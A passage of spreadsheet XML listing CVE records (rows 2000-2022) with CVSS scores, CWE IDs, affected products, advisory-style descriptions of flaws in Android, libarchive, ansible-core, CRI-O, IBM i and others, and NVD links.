      <c r="E2000" s="5" t="inlineStr"/>
      <c r="F2000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2000" s="5" t="inlineStr"/>
      <c r="H2000" s="5" t="inlineStr"/>
      <c r="I2000" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2000" s="5" t="inlineStr"/>
      <c r="K2000" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-636</t>
        </is>
      </c>
      <c r="L2000" s="5" t="inlineStr">
        <is>
          <t>(Holloway) Chew, Kean Ho's Actualizer v1.2.0 and earlier contains a fail-open password validation vulnerability in the Alpha user and root user password loops of Shell/debian-minbase-install.sh. The installer invokes mkpasswd to generate yescrypt password hashes but does not check the command's return value and unconditionally accepts the result. If mkpasswd fails to generate a yescrypt hash, for example because an incompatible mkpasswd implementation or an environment without yescrypt support is used, the resulting password hash variable can be empty and the build proceeds. The resulting image can therefore contain empty password fields for the root and alpha accounts, potentially permitting passwordless authentication depending on the authentication configuration.</t>
        </is>
      </c>
      <c r="M2000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85649</t>
        </is>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2001" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48565</t>
        </is>
      </c>
      <c r="C2001" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2001" s="5" t="inlineStr"/>
      <c r="F2001" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2001" s="5" t="inlineStr"/>
      <c r="H2001" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I2001" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J2001" s="5" t="inlineStr"/>
      <c r="K2001" s="5" t="inlineStr"/>
      <c r="L2001" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible way to bypass the cross profile intent filter due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48565</t>
        </is>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2002" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48566</t>
        </is>
      </c>
      <c r="C2002" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2002" s="5" t="inlineStr"/>
      <c r="F2002" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2002" s="5" t="inlineStr"/>
      <c r="H2002" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I2002" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J2002" s="5" t="inlineStr"/>
      <c r="K2002" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2002" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48566</t>
        </is>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2003" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-5914</t>
        </is>
      </c>
      <c r="C2003" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2003" s="5" t="inlineStr"/>
      <c r="F2003" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2003" s="5" t="inlineStr"/>
      <c r="H2003" s="5" t="inlineStr">
        <is>
          <t>libarchive:libarchive, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I2003" s="5" t="inlineStr">
        <is>
          <t>2025-06-09</t>
        </is>
      </c>
      <c r="J2003" s="5" t="inlineStr"/>
      <c r="K2003" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2003" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the libarchive library, specifically within the archive_read_format_rar_seek_data() function. This flaw involves an integer overflow that can ultimately lead to a double-free condition. Exploiting a double-free vulnerability can result in memory corruption, enabling an attacker to execute arbitrary code or cause a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M2003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-5914</t>
        </is>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2004" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-6020</t>
        </is>
      </c>
      <c r="C2004" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2004" s="5" t="inlineStr"/>
      <c r="F2004" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2004" s="5" t="inlineStr"/>
      <c r="H2004" s="5" t="inlineStr"/>
      <c r="I2004" s="5" t="inlineStr">
        <is>
          <t>2025-06-17</t>
        </is>
      </c>
      <c r="J2004" s="5" t="inlineStr"/>
      <c r="K2004" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2004" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in linux-pam. The module pam_namespace may use access user-controlled paths without proper protection, allowing local users to elevate their privileges to root via multiple symlink attacks and race conditions.</t>
        </is>
      </c>
      <c r="M2004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-6020</t>
        </is>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2005" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61731</t>
        </is>
      </c>
      <c r="C2005" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2005" s="5" t="inlineStr"/>
      <c r="F2005" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2005" s="5" t="inlineStr"/>
      <c r="H2005" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2005" s="5" t="inlineStr">
        <is>
          <t>2026-01-28</t>
        </is>
      </c>
      <c r="J2005" s="5" t="inlineStr"/>
      <c r="K2005" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2005" s="5" t="inlineStr">
        <is>
          <t>Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pkg-config command. An attacker can provide a "--log-file" argument to this directive, causing pkg-config to write to an attacker-controlled location.</t>
        </is>
      </c>
      <c r="M2005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61731</t>
        </is>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2006" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7425</t>
        </is>
      </c>
      <c r="C2006" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2006" s="5" t="inlineStr"/>
      <c r="F2006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2006" s="5" t="inlineStr"/>
      <c r="H2006" s="5" t="inlineStr"/>
      <c r="I2006" s="5" t="inlineStr">
        <is>
          <t>2025-07-10</t>
        </is>
      </c>
      <c r="J2006" s="5" t="inlineStr"/>
      <c r="K2006" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2006" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption.</t>
        </is>
      </c>
      <c r="M2006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7425</t>
        </is>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="C2007" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2007" s="5" t="inlineStr"/>
      <c r="F2007" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2007" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2007" s="5" t="inlineStr"/>
      <c r="I2007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2007" s="5" t="inlineStr"/>
      <c r="K2007" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2007" s="5" t="inlineStr">
        <is>
          <t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="C2008" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2008" s="5" t="inlineStr"/>
      <c r="F2008" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2008" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2008" s="5" t="inlineStr"/>
      <c r="I2008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2008" s="5" t="inlineStr"/>
      <c r="K2008" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2008" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11332</t>
        </is>
      </c>
      <c r="C2009" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2009" s="5" t="inlineStr"/>
      <c r="F2009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2009" s="5" t="inlineStr"/>
      <c r="H2009" s="5" t="inlineStr"/>
      <c r="I2009" s="5" t="inlineStr">
        <is>
          <t>2026-06-05</t>
        </is>
      </c>
      <c r="J2009" s="5" t="inlineStr"/>
      <c r="K2009" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2009" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role's meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install.</t>
        </is>
      </c>
      <c r="M2009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11332</t>
        </is>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12410</t>
        </is>
      </c>
      <c r="C2010" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2010" s="5" t="inlineStr"/>
      <c r="F2010" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2010" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2010" s="5" t="inlineStr"/>
      <c r="I2010" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2010" s="5" t="inlineStr"/>
      <c r="K2010" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2010" s="5" t="inlineStr">
        <is>
          <t>Link following vulnerability in the Uninstaller component in CCleaner prior to 7.10.1464 on Windows allows a local, low-privileged attacker to escalate privileges to SYSTEM via a symlink/junction created during application uninstallation, which CCleaner follows when deleting the application's data folder with elevated integrity.</t>
        </is>
      </c>
      <c r="M2010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12410</t>
        </is>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15809</t>
        </is>
      </c>
      <c r="C2011" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2011" s="5" t="inlineStr"/>
      <c r="F2011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2011" s="5" t="inlineStr"/>
      <c r="H2011" s="5" t="inlineStr"/>
      <c r="I2011" s="5" t="inlineStr">
        <is>
          <t>2026-07-15</t>
        </is>
      </c>
      <c r="J2011" s="5" t="inlineStr"/>
      <c r="K2011" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-134</t>
        </is>
      </c>
      <c r="L2011" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.</t>
        </is>
      </c>
      <c r="M2011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15809</t>
        </is>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16826</t>
        </is>
      </c>
      <c r="C2012" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2012" s="5" t="inlineStr"/>
      <c r="F2012" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2012" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2012" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2012" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2012" s="5" t="inlineStr"/>
      <c r="K2012" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2012" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M2012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16826</t>
        </is>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17499</t>
        </is>
      </c>
      <c r="C2013" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2013" s="5" t="inlineStr"/>
      <c r="F2013" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2013" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2013" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2013" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2013" s="5" t="inlineStr"/>
      <c r="K2013" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2013" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M2013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17523</t>
        </is>
      </c>
      <c r="C2014" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2014" s="5" t="inlineStr"/>
      <c r="F2014" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2014" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2014" s="5" t="inlineStr"/>
      <c r="I2014" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2014" s="5" t="inlineStr"/>
      <c r="K2014" s="5" t="inlineStr"/>
      <c r="L2014" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
can: bcm: switch timer to HRTIMER_MODE_SOFT and remove hrtimer_tasklet
This patch switches the timer to HRTIMER_MODE_SOFT, which executed the
timer callback in softirq context and removes the hrtimer_tasklet.</t>
        </is>
      </c>
      <c r="M2014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19820</t>
        </is>
      </c>
      <c r="C2015" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2015" s="5" t="inlineStr"/>
      <c r="F2015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2015" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2015" s="5" t="inlineStr"/>
      <c r="I2015" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2015" s="5" t="inlineStr"/>
      <c r="K2015" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2015" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Backblaze Client allows a local user to make the system not bootable by creating a link from Backblaze's folder to Windows OS system files during a backup. Successful exploitation requires an administrator-level system change that results in the absence of specific Windows OS security controls. This vulnerability is due to improper link resolution.</t>
        </is>
      </c>
      <c r="M2015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19820</t>
        </is>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2050</t>
        </is>
      </c>
      <c r="C2016" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2016" s="5" t="inlineStr"/>
      <c r="F2016" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2016" s="5" t="inlineStr"/>
      <c r="H2016" s="5" t="inlineStr">
        <is>
          <t>gimp:gimp</t>
        </is>
      </c>
      <c r="I2016" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2016" s="5" t="inlineStr"/>
      <c r="K2016" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-131</t>
        </is>
      </c>
      <c r="L2016" s="5" t="inlineStr">
        <is>
          <t>GIMP HDR File Parsing Heap-based Buffer Overflow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HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28266.</t>
        </is>
      </c>
      <c r="M2016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2050</t>
        </is>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2310</t>
        </is>
      </c>
      <c r="C2017" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2017" s="5" t="inlineStr"/>
      <c r="F2017" s="5" t="inlineStr"/>
      <c r="G2017" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2017" s="5" t="inlineStr"/>
      <c r="I2017" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2017" s="5" t="inlineStr"/>
      <c r="K2017" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L2017" s="5" t="inlineStr">
        <is>
          <t>IBM webMethods Integration Server 11.1 IBM webMethods Integration is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="M2017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2310</t>
        </is>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28572</t>
        </is>
      </c>
      <c r="C2018" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2018" s="5" t="inlineStr"/>
      <c r="F2018" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2018" s="5" t="inlineStr"/>
      <c r="H2018" s="5" t="inlineStr"/>
      <c r="I2018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2018" s="5" t="inlineStr"/>
      <c r="K2018" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2018" s="5" t="inlineStr">
        <is>
          <t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t>
        </is>
      </c>
    </row>
    <row r="2019">
      <c r="A2019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28583</t>
        </is>
      </c>
      <c r="C2019" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2019" s="5" t="inlineStr"/>
      <c r="F2019" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2019" s="5" t="inlineStr"/>
      <c r="H2019" s="5" t="inlineStr"/>
      <c r="I2019" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2019" s="5" t="inlineStr"/>
      <c r="K2019" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="L2019" s="5" t="inlineStr">
        <is>
          <t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t>
        </is>
      </c>
    </row>
    <row r="2020">
      <c r="A2020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28590</t>
        </is>
      </c>
      <c r="C2020" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2020" s="5" t="inlineStr"/>
      <c r="F2020" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2020" s="5" t="inlineStr"/>
      <c r="H2020" s="5" t="inlineStr"/>
      <c r="I2020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2020" s="5" t="inlineStr"/>
      <c r="K2020" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2020" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t>
        </is>
      </c>
    </row>
    <row r="2021">
      <c r="A2021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="C2021" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2021" s="5" t="inlineStr"/>
      <c r="F2021" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2021" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2021" s="5" t="inlineStr"/>
      <c r="I2021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2021" s="5" t="inlineStr"/>
      <c r="K2021" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="L2021" s="5" t="inlineStr">
        <is>
          <t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28594</t>
        </is>
      </c>
      <c r="C2022" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2022" s="5" t="inlineStr"/>
      <c r="F2022" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2022" s="5" t="inlineStr"/>
      <c r="H2022" s="5" t="inlineStr"/>
      <c r="I2022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2022" s="5" t="inlineStr"/>
      <c r="K2022" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2022" s="5" t="inlineStr">
        <is>
